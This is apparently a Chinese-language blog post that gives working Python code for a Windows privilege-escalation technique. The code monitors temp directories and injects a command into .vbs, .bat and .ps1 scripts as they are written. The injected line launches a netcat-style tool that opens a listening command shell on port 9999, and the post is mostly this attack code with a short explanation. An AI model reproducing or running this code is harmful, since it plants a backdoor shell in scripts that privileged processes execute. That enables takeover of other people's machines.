代碼思路：

首先定義三個文件類型。.vbs,.bat,.ps1。對這三個后綴名的文件進行監視，并根據后綴名不同，插入不同的代碼。（意思都是運行那個command）。

windows是創建一個文件并寫入數據的過程，其實就是先create,再modify，所以當檢測到有后綴名為windows下可以執行的文件被修改時。就可以插入惡意代碼。這里簡單的用一個inject_code()函數來表示插入的過程。

同時為了區分一個臨時文件是否已經被插入了惡意代碼，可以使用一個標志位加以區分。

代碼：

            import win32file
import tempfile
import threading
import os
import win32con

dir_minitor=["C:\\Windows\\Temp",tempfile.gettempdir()]
FILE_CREATED =1
FILE_DELETED =2
FILE_MODIFIED = 3
FILE_RENAMED_FROM=4
FILE_RENAMED_TO = 5

file_type={}
command="C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
file_type['.vbs']=['\r\nbhpmarker\r\n','\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n'%command]
file_type['.bat']=['\r\nbhpmarker\r\n','\r\n%s\r\n'%command]
file_type['.ps1']=['\r\nbhpmarker\r\n','Start-Process\"%s\"\r\n'%command]

#print file_type.keys()
def code_inject(full_filename,extension,contents):
    #print "run"
    if file_type[extension][0] in contents:
        #print "hahha"
        return
    full_content=file_type[extension][0]
    full_content+=file_type[extension][1]
    full_content+=contents

    fd=open(full_filename,"wb")
    fd.write(full_content)
    fd.close()

    print "Injected code"
    return

def startMimitor(dir):
    FILE_LIST_DIRECTORY=0x0001
    dir_director=win32file.CreateFile(
        dir,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE|win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None
    )
    while 1:
        try:
            results=win32file.ReadDirectoryChangesW(
                dir_director,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_DIR_NAME|win32con.FILE_NOTIFY_CHANGE_FILE_NAME|win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES|win32con.FILE_NOTIFY_CHANGE_SIZE|win32con.FILE_NOTIFY_CHANGE_LAST_WRITE|win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
            )
            for action,file_name in results:
                full_filename=os.path.join(dir,file_name)
                #print full_filename
                filename,extension = os.path.splitext(full_filename)
                # print filename
                # print extension
                if extension in file_type:
                    flag=1
                if action==FILE_CREATED:
                    if flag:
                        print "[*] Created %s"%full_filename
                elif action==FILE_DELETED:
                    if flag:
                        print "[-] Deleted %s"%full_filename
                elif action==FILE_MODIFIED:
                    if flag:
                        print "[*] Modified %s"%full_filename

                        print "[vvv] Dumping contents ...."
                        try:
                            fd = open(full_filename,"rb")
                            contents=fd.read()
                            fd.close()
                            print contents
                            print "[^^^] Dump complete."
                        except:
                            print "[!!!] Failed"
                        filename,extension=os.path.splitext(full_filename)
                        print full_filename+extension+contents
                        code_inject(full_filename,extension,contents)
                elif action==FILE_RENAMED_FROM:
                    if flag:
                        print "[>] Renamed from :%s"%full_filename
                elif action==FILE_RENAMED_TO:
                    if flag:
                        print "[<] Renamed to %s"%full_filename
                else:
                    if flag:
                        print "[???] Unknown:%s"%full_filename
        except:
            pass


for path in dir_minitor:
    monitor_thread = threading.Thread(target=startMimitor,args=(path,))
    print "Spawning monitoring thread for path:%s"%path
    # print file_type
    # if '.bat' in file_type.keys():
    #     print file_type
    monitor_thread.start()
          

運行結果：

?

?